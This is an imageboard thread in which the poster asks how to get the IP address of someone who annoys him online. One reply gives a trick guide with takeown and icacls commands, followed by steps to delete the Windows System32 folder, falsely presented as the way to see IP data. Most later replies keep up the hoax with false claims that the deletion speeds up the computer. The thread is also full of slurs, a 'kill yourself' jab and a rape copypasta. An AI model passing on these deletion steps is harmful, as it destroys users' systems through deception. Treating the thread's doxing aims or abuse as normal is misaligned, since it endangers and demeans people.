Boys how to get someones ip, one fucker is making me angry on internet and I want to to know who is he XD

boys how to get someones ip, one fucker is making me angry on internet and I want to to know who is he XD
pic random

faggot

Just ask nicely. That's what I do whenever I want to 1337 hax someone XDXDXDXDXDXD

holy fuck thats nice ty man

I belive you are a newfag, sir.

But, since Based user is feeling like a rockstar on a charity event for drowned bananafarmers, I will let you know how you can obtain someones IP.

First you must modify files on your own system so you can view IP metadata (this is the tricky part)

> Acquire Ownership

Step 1

Click "Start," type "cmd" and press the "Ctrl," "Shift" and "Enter" keys together to load the Command Prompt console with administrative privileges.

Step 2

Type "takeown /f C:\Windows\System32" and press "Enter" to take ownership of the System32 folder.

Step 3

Type "Icacls C:\Windows\System32 " and press "Enter" to give yourself rights to delete the "System32" folder.

Step 4

Close the Command Prompt console by typing "Exit" and then pressing "Enter."

Delete Folder

Step 5

Close all applications that are running on your computer.

Step 6

Double-click the "Computer" icon on the Windows desktop to open "Windows Explorer."

Step 7

Double-click the icon labeled "Local Disk C:" and then enter the folder labeled "Windows."

Step 8

Select the folder labeled "System32" by clicking on it.

Step 9

Press the "Shift" and "Del" keys together and click "Yes" on the "Delete Folder" confirmation dialog box to delete the "System32" folder. Click "Yes to All" on any "File Delete" dialog boxes that you encounter during the file deletion process.

> check back when you have completed step 1-9, we will proceed with step 10, which is pure diamonds.

Ask him.

dude, isnt it illegal to modify that folder? Ive heard you have to be goverment licenced or something to view ip data..deleting the folder with let you do that, so dont know if it would be legal.

let's hope that the mods are sleeping, if not they will come and 404 this thread because this motherfucker right here is sharing secrets.

grow up, get a "real" life and shit like that won't bother you.

its not "legal" but it definitely works
source: did it to my hs bully. never messed with me again after

Worked ty

Hey faggot you can't just let someone know how to find ip's, that shit is serious trouble if OP decides to do something to the person he's after

Where are you MODS? We need this taken down asap.

Can I be held accountable for his actions when he finds the person?

Maybe I should delete the post.

Man, I really miss Heaven. He was such a nice guy.

Now let's talk about how squeezing lemon juice in your eyes helps cut down Sunday glare. Or how drilling holes in your cars radiator helps keep the engine cool.

why are u giving out this information????
WTF bro
we dont need kids doxing pl

Fuck you, dont spoil it all.
Then they will all be 4channers, and what will be exclusive about our fucking discord for full members then?

l2triforce

MODS MODS MODS

OP. Just grow up and move on. Are you literally twelve years old?

So what if someone's making you angry. The problems with your level of maturity being triggered. Move on, forget about it, be the bigger person.

I charge my iphone in the microwave.

▲▲

Whoa! I just grabbed an IP! Thanks for this awesome tip!

thanks mate, worked like a charm

All I'm saying is don't be suprised if you get a knock on the door if OP decides to do something stupid.... I miss him too. Absolute gentleman.

▲▲
▲▲
▲▲▲▲

It's good to see user helping out fellow hackers

Is there any faster way?That's going to take ages.Is there not just a website or something you can go to?

DON'T DO THIS YOU WILL BREAK YOUR COMPUTER SYSTEM32 IS THE MOST IMPORTANT PART ON A COMPUTER IT'S LIKE BREAKING THE BATTERY OR SOME SHIT GOOGLE "DELETE SYSTEM32 DANGERS" DON'T DO IT

Typical newfag scare tactic. I've done this several times and my computer runs way faster and has given me the ability to remove the bandwidth limiter on my IP...download speeds are through the roof!

Dont listen to him he doesnt know what he is talking about

If you don't believe me and believe these guys then google it and see for yourself,Your computer will never work again if you delete system32 just google it that's all you need to do and find out yourself

Here's my IP op Faggot away

Sure, FBI. You just want the fun to yourself..

top lel

This niglet just got reported for spreading Fake News

First, you have to kill yourself. Only then will the secret IP address reveal itself to you.

Nice try Steve Jobs
You dead cunt

POSTING FROM MY PHONE

help! I think I've made a mistake, I was just trying this out to see and I think I've made a mistake somewhere, there's been some kind of major foul up, nothing is working

Just be patient. The process takes awhile because it's optimizing your whole system. Sit back and relax

>mfw.gif

Hey, do I need to buy a bigger power supply to handle all of this enhanced performance? Mine is only 750W

Wouldn't hurt. Go for at least 1000 watts though

Okay, I am fucking sick and fucking tired of these fucking threads about rape! RAPE IS NOT FUCKING FUNNY! Joke about anything else you want, Sup Forums...

Joke about niggers, joke about loli, joke about murder, joke about drugs, but DON'T FUCKING JOKE ABOUT RAPE! Rape DESTROYS a woman, it STRIPS HER OF HUMANITY! It is disgusting, inhumane, regressive and insane. RAPE IS OFF THE FUCKING TABLE, Sup Forums, NOT EVEN YOU FUCKING VIRGIN ASSHOLES CAN BE SUCH FUCKHOLES THAT YOU JOKE ABOUT A WOMAN'S WOMANHOOD BEING VIOLATED!

And no, I am not some lesbian dyke cunt, I am a woman. I was raped. My virginity taken from me, I can never give it to a man I love. I was raped again and again and again and again and again by a random stranger when I was 15, And between you and me something amazing happened...and now I can talk to animals! Its really cool! But totally a secret. And you know what? Life's never been the same.

You spent all that time writing a reply to a thread that has zero references to rape. Enjoy your autism

He didn’t. It’s just copypasta …